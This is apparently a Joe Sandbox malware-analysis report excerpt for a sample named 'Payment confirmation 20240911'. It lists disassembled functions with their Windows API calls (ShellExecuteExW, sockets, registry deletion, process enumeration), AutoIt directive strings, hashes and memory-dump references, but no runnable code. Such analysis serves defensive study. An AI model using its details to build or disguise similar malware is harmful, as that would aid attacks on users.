                                          • Instruction ID: 21167f1d18355e59aaaedd15954ebf43479d6e5a427976582174af57d8b6f1fe
                                          • Opcode Fuzzy Hash: 683f6436cabf3380b7e715f7514679dc5ef7df09cd1d9925a2f68f6d80ae90d7
                                          • Instruction Fuzzy Hash: 54717A7191010AEFDB14CF98C998EBEBF78FF89314F148159EA15AA251C734AA41CFA4
                                          Function 01342121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0134214B
                                          • _memset.LIBCMT ref: 01342214
                                          • ShellExecuteExW.SHELL32(?), ref: 01342259
                                            • Part of subcall function 012E84A6: __swprintf.LIBCMT ref: 012E84E5
                                            • Part of subcall function 012E84A6: __itow.LIBCMT ref: 012E8519
                                            • Part of subcall function 012E3BCF: _wcscpy.LIBCMT ref: 012E3BF2
                                          • CloseHandle.KERNEL32(00000000), ref: 01342320
                                          • FreeLibrary.KERNEL32(00000000), ref: 0134232F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                          • String ID: @
                                          • API String ID: 4082843840-2766056989
                                          • Opcode ID: 8d06cab5c140707f907809f254c89ee597c3ad4d25b30cbc81535100717ef8b2
                                          • Instruction ID: 4b5120bcfe87a1d24dd225c93c383ac5c177283e1c251da42cfca32037506aae
                                          • Opcode Fuzzy Hash: 8d06cab5c140707f907809f254c89ee597c3ad4d25b30cbc81535100717ef8b2
                                          • Instruction Fuzzy Hash: B8717A75A1061ADFCB15EFA8D8949AEBBF5FF48314F048059E95ABB350DB30AD40CB90
                                          Function 013247DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: 43448f3d4507d504d8b5d345cc344289d403daa8209e591f19993049243096db
                                          • Instruction ID: b494f5041008838f4208bc1ef909daabe50c53bb08e270fd25d19f44e397cf71
                                          • Opcode Fuzzy Hash: 43448f3d4507d504d8b5d345cc344289d403daa8209e591f19993049243096db
                                          • Instruction Fuzzy Hash: 0251F4B0A187E53DFB36633CCC45BBABFA95F06308F088589E2D5468C2C6D9E884D751
                                          Function 013245F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: 3c1b974dc08cb85e16f10043bf2c512500c40c01b2bba58393e6d579adbe5dee
                                          • Instruction ID: 64d0c9624ce08b4bb8fc7840bc5ded21b58fb2e58de4e5dff8706e152f7597b9
                                          • Opcode Fuzzy Hash: 3c1b974dc08cb85e16f10043bf2c512500c40c01b2bba58393e6d579adbe5dee
                                          • Instruction Fuzzy Hash: 8F51F9B06047E67DFB37A72C8C45B76BF995B06308F088489E2F55A8C2D3D5E898DB50
                                          Function 013286AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _wcsncpy$LocalTime
                                          • String ID:
                                          • API String ID: 2945705084-0
                                          • Opcode ID: a9771d9efc8cbdd3b680eff6a6b16d632d282a0dd7b2c69768dc139d52c130df
                                          • Instruction ID: 36f1988a887cf7204d34179ba9bf0774bef494bc8a6bdbb8f2a63d527b8afdcc
                                          • Opcode Fuzzy Hash: a9771d9efc8cbdd3b680eff6a6b16d632d282a0dd7b2c69768dc139d52c130df
                                          • Instruction Fuzzy Hash: 75417E65C2022575CB12EBFCC889ACFBBECAF15314F548866D519F3160EA30E26487A5
                                          Function 0133936F Relevance: 10.6, APIs: 7, Instructions: 136networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0137DBF0), ref: 01339409
                                          • WSAGetLastError.WSOCK32(00000000), ref: 01339416
                                          • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 0133943A
                                          • #16.WSOCK32(?,?,00000000,00000000), ref: 01339452
                                          • _strlen.LIBCMT ref: 01339484
                                          • _memmove.LIBCMT ref: 013394CA
                                          • WSAGetLastError.WSOCK32(00000000), ref: 013394F7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_memmove_strlenselect
                                          • String ID:
                                          • API String ID: 2795762555-0
                                          • Opcode ID: d396ec3f5094ffd3a3b24a02eb3553134015b58eb6c507c63d1599414468d82c
                                          • Instruction ID: 49e08b9648816feda1ce8080e89a38c3f415e0dd8b9908f37e438bc019e09c46
                                          • Opcode Fuzzy Hash: d396ec3f5094ffd3a3b24a02eb3553134015b58eb6c507c63d1599414468d82c
                                          • Instruction Fuzzy Hash: F4418475600109EFCB14EFA8C998FAEB7BDEF58318F108159E516A72D1DB74AE00CB64
                                          Function 0134CB07 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `"u
                                          • API String ID: 0-810275233
                                          • Opcode ID: 8cabceb26c67a39137bdec641229f95d46dc73dc4bfca81e21fa6675035a72f0
                                          • Instruction ID: 4c170bd85a280d98fea098c9cc5c1172818e2b5edc4693556c589b619504b2da
                                          • Opcode Fuzzy Hash: 8cabceb26c67a39137bdec641229f95d46dc73dc4bfca81e21fa6675035a72f0
                                          • Instruction Fuzzy Hash: B141E239A01108ABEB20DB6CCC48FA9BFEDEB09324F055255EA56A72E1C770BD01DB50
                                          Function 01343C63 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 01343C92
                                          • RegOpenKeyExW.ADVAPI32 ref: 01343CBC
                                          • FreeLibrary.KERNEL32(00000000), ref: 01343D71
                                            • Part of subcall function 01343C63: RegCloseKey.ADVAPI32(?), ref: 01343CD9
                                            • Part of subcall function 01343C63: FreeLibrary.KERNEL32(?), ref: 01343D2B
                                            • Part of subcall function 01343C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01343D4E
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 01343D16
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                          • String ID:
                                          • API String ID: 395352322-0
                                          • Opcode ID: 84bb0f2efdc22c37afd75593d4281a437118dc0ef984a56473a55c613724addd
                                          • Instruction ID: c21a57d7072ea16ffda779ae8f89c42d984afc2012dabfb36a0aaf8de0e05d46
                                          • Opcode Fuzzy Hash: 84bb0f2efdc22c37afd75593d4281a437118dc0ef984a56473a55c613724addd
                                          • Instruction Fuzzy Hash: F6312B71A00219BFEB159FD4DC89EFEBBBCFF09344F00416AE552E3150D670AA498B60
                                          Function 013216F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01321734
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0132175A
                                          • SysAllocString.OLEAUT32(00000000), ref: 0132175D
                                          • SysAllocString.OLEAUT32(?), ref: 0132177B
                                          • SysFreeString.OLEAUT32(?), ref: 01321784
                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 013217A9
                                          • SysAllocString.OLEAUT32(?), ref: 013217B7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          • API String ID: 3761583154-0
                                          • Opcode ID: d23a850cc230f02167d3a10cc3be1cafdad31b27b0dc2db988d7eef1224db273
                                          • Instruction ID: c3e4b84b7ac230d2353537eee77ee14ee8b3dc9bfff19508c0ea99c30e8e563c
                                          • Opcode Fuzzy Hash: d23a850cc230f02167d3a10cc3be1cafdad31b27b0dc2db988d7eef1224db273
                                          • Instruction Fuzzy Hash: 6921B275600219AFDB11ABACCD88CEF77ECEB49364B008125F945DB291DB70ED418764
                                          Function 013269F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012E31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 012E31DA
                                          • lstrcmpiW.KERNEL32(?,?), ref: 01326A2B
                                          • _wcscmp.LIBCMT ref: 01326A49
                                          • MoveFileW.KERNEL32 ref: 01326A62
                                          • _wcscat.LIBCMT ref: 01326AA4
                                          • SHFileOperationW.SHELL32(?), ref: 01326B0C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: File$FullMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                          • String ID: \*.*
                                          • API String ID: 2594697848-1173974218
                                          • Opcode ID: 885f51a1542624fcec4033e6f1d118216447c95d53f1177be3021d3c605d42c2
                                          • Instruction ID: 4e916ff3e119a60c7c21553bbeb60e11b95573054440d45c725681d12a95af7b
                                          • Opcode Fuzzy Hash: 885f51a1542624fcec4033e6f1d118216447c95d53f1177be3021d3c605d42c2
                                          • Instruction Fuzzy Hash: B33114B1901229AADF61FFB8D845ADDB7B8AF18304F5045EAE905E3141EB30D789CF64
                                          Function 01322FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                          • API String ID: 1038674560-2734436370
                                          • Opcode ID: abbf483283bafa316d056cff54ad2ead76f5e95d809a4da1c2ace0b1b3b62847
                                          • Instruction ID: 653cef0ac1883853c9735cf04ad6841963187431e77416bd3a65274ec63c1e41
                                          • Opcode Fuzzy Hash: abbf483283bafa316d056cff54ad2ead76f5e95d809a4da1c2ace0b1b3b62847
                                          • Instruction Fuzzy Hash: 1B214C3210453676D636B67C9C05FBB73ECEF6934CF008029F546971C4EBA99982C3A0
                                          Function 013217C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0132180D
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01321833
                                          • SysAllocString.OLEAUT32(00000000), ref: 01321836
                                          • SysAllocString.OLEAUT32 ref: 01321857
                                          • SysFreeString.OLEAUT32 ref: 01321860
                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0132187A
                                          • SysAllocString.OLEAUT32(?), ref: 01321888
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          • API String ID: 3761583154-0
                                          • Opcode ID: a826c408b180274d5624dd00488c46c9c30ef9993d8c45153891258b8efdaa0b
                                          • Instruction ID: ecf44309e62ef94adf4d6c4cfd2716c7977e400ce202e7c83722822912f9bff7
                                          • Opcode Fuzzy Hash: a826c408b180274d5624dd00488c46c9c30ef9993d8c45153891258b8efdaa0b
                                          • Instruction Fuzzy Hash: AB217135600214AFDB11ABECDD88DBA7BECEF09364B408125F955DB2A5DAB0EC418B64
                                          Function 0134A0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012FC619: CreateWindowExW.USER32 ref: 012FC657
                                            • Part of subcall function 012FC619: GetStockObject.GDI32(00000011), ref: 012FC66B
                                            • Part of subcall function 012FC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 012FC675
                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0134A13B
                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0134A148
                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0134A153
                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0134A162
                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0134A16E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$CreateObjectStockWindow
                                          • String ID: Msctls_Progress32
                                          • API String ID: 1025951953-3636473452
                                          • Opcode ID: 7f4f433c6d33048c417f175d699d84ecce01db1fcf4b0d9b12cea2e6473f56d2
                                          • Instruction ID: e996ed3f3871f4ae3ed91206a9cde79fd4cc6ccab3ff9844bbcfcf643edbbc31
                                          • Opcode Fuzzy Hash: 7f4f433c6d33048c417f175d699d84ecce01db1fcf4b0d9b12cea2e6473f56d2
                                          • Instruction Fuzzy Hash: 8A1190B215021DBFEF114E65CC85EE77F5DEF08798F014215FA09A6090C676AC21DBA0
                                          Function 012FC697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClientRect.USER32(?,?), ref: 012FC6C0
                                          • GetWindowRect.USER32(?,?), ref: 012FC701
                                          • ScreenToClient.USER32(?,?), ref: 012FC729
                                          • GetClientRect.USER32(?,?), ref: 012FC856
                                          • GetWindowRect.USER32(?,?), ref: 012FC86F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Rect$Client$Window$Screen
                                          • String ID:
                                          • API String ID: 1296646539-0
                                          • Opcode ID: de268eab6e3eee99c6e9156ab1753bf6cb3963ae9e92a0345b4f4cbe25b6d24d
                                          • Instruction ID: 07024095bef5c802f0477f1fd6ac559eb7caf976cf3e50c68c64511ece47eb43
                                          • Opcode Fuzzy Hash: de268eab6e3eee99c6e9156ab1753bf6cb3963ae9e92a0345b4f4cbe25b6d24d
                                          • Instruction Fuzzy Hash: 8CB16C7991024ADBDF14CFA8C480BEDBBB1FF08714F049129EE59EB254DB70AA50CB54
                                          Function 01329569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memmove$__itow__swprintf
                                          • String ID:
                                          • API String ID: 3253778849-0
                                          • Opcode ID: 471d5e6b8384617b5450121dfbb57a0781c1f5c262bdb6e723fff68a37f2944d
                                          • Instruction ID: b6a1f9e0544d6a6115535929835355230eccea259ca607f2e5910a9410c1ed82
                                          • Opcode Fuzzy Hash: 471d5e6b8384617b5450121dfbb57a0781c1f5c262bdb6e723fff68a37f2944d
                                          • Instruction Fuzzy Hash: A661A93051022B9BDF16FF68CD84FFE77E8EF14218F444458E95A6B291EB349915CB90
                                          Function 01341AD0 Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 01341B09
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 01341B17
                                          • __wsplitpath.LIBCMT ref: 01341B45
                                            • Part of subcall function 0130297D: __wsplitpath_helper.LIBCMT ref: 013029BD
                                          • _wcscat.LIBCMT ref: 01341B5A
                                          • Process32NextW.KERNEL32(00000000,?), ref: 01341BD0
                                          • CloseHandle.KERNEL32(00000000), ref: 01341BE2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                          • String ID:
                                          • API String ID: 1380811348-0
                                          • Opcode ID: 46c6992ad48f270f2459a8c971ab34ae6e82b9c6308140ff0401d0d37046a8fa
                                          • Instruction ID: 0e5d73fcd2365d0d2a7d690cf0599a27ed891236d6070745a9130131b72b2f6f
                                          • Opcode Fuzzy Hash: 46c6992ad48f270f2459a8c971ab34ae6e82b9c6308140ff0401d0d37046a8fa
                                          • Instruction Fuzzy Hash: BA518E715143059FD720EF64C884EABB7ECEF88758F40491EF58997290EB70EA44CBA2
                                          Function 01342EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                            • Part of subcall function 01343AF7: CharUpperBuffW.USER32(?,?), ref: 01343B0E
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01342FA0
                                          • RegOpenKeyExW.ADVAPI32 ref: 01342FE0
                                          • RegCloseKey.ADVAPI32(?), ref: 01343003
                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0134302C
                                          • RegCloseKey.ADVAPI32(?), ref: 0134306F
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0134307C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                          • String ID:
                                          • API String ID: 4046560759-0
                                          • Opcode ID: b78d43bee774e05f8e6a1340aeb0de293cc0b54dfeba9e2da247cc423bbdaeeb
                                          • Instruction ID: 536243aa581d99cb09e643278662fa5c6499c6962acaabb7ff63503feac8a2f9
